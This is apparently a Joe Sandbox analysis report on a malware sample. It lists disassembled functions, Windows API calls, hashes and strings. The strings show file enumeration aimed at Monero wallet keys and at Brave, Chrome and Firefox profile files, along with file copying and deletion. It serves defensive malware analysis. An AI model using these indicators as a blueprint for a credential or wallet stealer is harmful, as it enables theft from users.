Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: cfeb40390a8b1d468585dc8cd48c8d7e1605dfeb8cd514990c71a82422606098
Instruction ID: 499c794af3e19a1ce31b26bb0f8ae1fc597b04bd8e53dd79c6f29555f18a8d16
Opcode Fuzzy Hash: cfeb40390a8b1d468585dc8cd48c8d7e1605dfeb8cd514990c71a82422606098
Instruction Fuzzy Hash: DC410662FC670C7AC73EFBA4994EEDF77665F42B00F509064E82096284CBB875184D2A

Function 0034BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00360B32,00360B2B,00000000,?,?,?,003613F4,00360B2A), ref: 0034BEF5
StrCmpCA.SHLWAPI(?,003613F8), ref: 0034BF4D
StrCmpCA.SHLWAPI(?,003613FC), ref: 0034BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0034C7BF
FindClose.KERNEL32(000000FF), ref: 0034C7D1

Strings

Preferences, xrefs: 0034C11E
Brave, xrefs: 0034C102
\Brave\Preferences, xrefs: 0034C1DB
Google Chrome, xrefs: 0034C634

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: c5f5f91881673f492eda87f68272c23292e18eb4a91d4ece973228df50672751
Instruction ID: b6c4b0df0da5c36b486c2e7d07bc5727c2b96897120ed72455de16721797ead4
Opcode Fuzzy Hash: c5f5f91881673f492eda87f68272c23292e18eb4a91d4ece973228df50672751
Instruction Fuzzy Hash: 844275719101089BDB16FBB0DC56EED777CAB54301F404658FD06AA0A1EF34AB4DEBA2

Function 6C6435A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6CF688,00001000), ref: 6C6435D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6435E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6435FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C64363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C64369F
__aulldiv.LIBCMT ref: 6C6436E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C643773
EnterCriticalSection.KERNEL32(6C6CF688), ref: 6C64377E
LeaveCriticalSection.KERNEL32(6C6CF688), ref: 6C6437BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6437C4
EnterCriticalSection.KERNEL32(6C6CF688), ref: 6C6437CB
LeaveCriticalSection.KERNEL32(6C6CF688), ref: 6C643801
__aulldiv.LIBCMT ref: 6C643883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C643902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C643918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C64394C

Strings

GenuntelineI, xrefs: 6C643639
MOZ_TIMESTAMP_MODE, xrefs: 6C6435DB
QPC, xrefs: 6C6438FC
AuthcAMDenti, xrefs: 6C643946
GTC, xrefs: 6C643912

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: b70fcd4d8b21de6663a994f61d9772c0e6bb65a1e57d45cd6a9aa733ee7d5fff
Instruction ID: 22f0228e289a3ab49a087c57b93734ea8a374ba50b11e6f1d2c8c918890a7818
Opcode Fuzzy Hash: b70fcd4d8b21de6663a994f61d9772c0e6bb65a1e57d45cd6a9aa733ee7d5fff
Instruction Fuzzy Hash: 52B1B271B083109FDB08DF2AC49565ABBF5EB8A704F14C93EE899D3750D7349A018B9E

Function 00354910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0035492C
FindFirstFileA.KERNEL32(?,?), ref: 00354943
StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
FindClose.KERNEL32(000000FF), ref: 00354B92

Strings

%s\%s, xrefs: 003549FB
%s\*, xrefs: 00354920
%s\%s, xrefs: 003549A4

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: c4e11ae56eb166797b0822391426926f5361bf0b249643c5f5ac612f480339a0
Instruction ID: d0a44581778ecfcd9a958c788cdf9f63c21507853d497a6a3bc6eabc747019a2
Opcode Fuzzy Hash: c4e11ae56eb166797b0822391426926f5361bf0b249643c5f5ac612f480339a0
Instruction Fuzzy Hash: E1619A71900208ABDB25EFA0DC45FEA737CFB58301F048589F909A6054EB74EB89DFA1

Function 00353EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00353EC3
FindFirstFileA.KERNEL32(?,?), ref: 00353EDA
StrCmpCA.SHLWAPI(?,00360FAC), ref: 00353F08
StrCmpCA.SHLWAPI(?,00360FB0), ref: 00353F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0035406C
FindClose.KERNEL32(000000FF), ref: 00354081

Strings

%s\%s, xrefs: 00353EB7

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: c366e369ae682a04bf274baa2644c05cf1c06abf034d575d1d5458836b853ed7
Instruction ID: 4521daf7041de2627f8036a2b8e21248d555c577eb67188a48c429b955a89d72
Opcode Fuzzy Hash: c366e369ae682a04bf274baa2644c05cf1c06abf034d575d1d5458836b853ed7
Instruction Fuzzy Hash: 66517CB2900218ABDB25FBB0DC45EEA737CBB54301F004589FA59A6050EB75EB8DDF61

Function 0034F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003615B8,00360D96), ref: 0034F71E
StrCmpCA.SHLWAPI(?,003615BC), ref: 0034F76F
StrCmpCA.SHLWAPI(?,003615C0), ref: 0034F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0034FAB1
FindClose.KERNEL32(000000FF), ref: 0034FAC3

Strings

prefs.js, xrefs: 0034F812

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: c2aa0dff3bd964dd2996afd71f30331127a1cdb095c0dafd7af75574cecb5f4f
Instruction ID: ca260112845ce9ec7e0f4d34a4318cc71196c122a2b480de675a6e757445bbb1
Opcode Fuzzy Hash: c2aa0dff3bd964dd2996afd71f30331127a1cdb095c0dafd7af75574cecb5f4f
Instruction Fuzzy Hash: 4FB153719006189BDB25EF60DC56EEE7778AF54301F4082A8EC0A9E151EF306B4DEF92

Function 003416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0036510C,?,?,?,003651B4,?,?,00000000,?,00000000), ref: 00341923
StrCmpCA.SHLWAPI(?,0036525C), ref: 00341973
StrCmpCA.SHLWAPI(?,00365304), ref: 00341989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341D40
DeleteFileA.KERNEL32(00000000), ref: 00341DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00341E20
FindClose.KERNEL32(000000FF), ref: 00341E32

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Strings

\*.*, xrefs: 003417F1

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f6cc892ae364f46fe4203751ffcbe0f1a26b9c380d1afa0822f40f50e2343778
Instruction ID: 8fa5030dccd594055603ca7c1b4a8a0485c1a83898c809e177195f2414ae0852
Opcode Fuzzy Hash: f6cc892ae364f46fe4203751ffcbe0f1a26b9c380d1afa0822f40f50e2343778
Instruction Fuzzy Hash: 0412E2719105189BDB16FB60CC96EEE7778BF54301F404299B9066A0A1EF306F8DEFA1

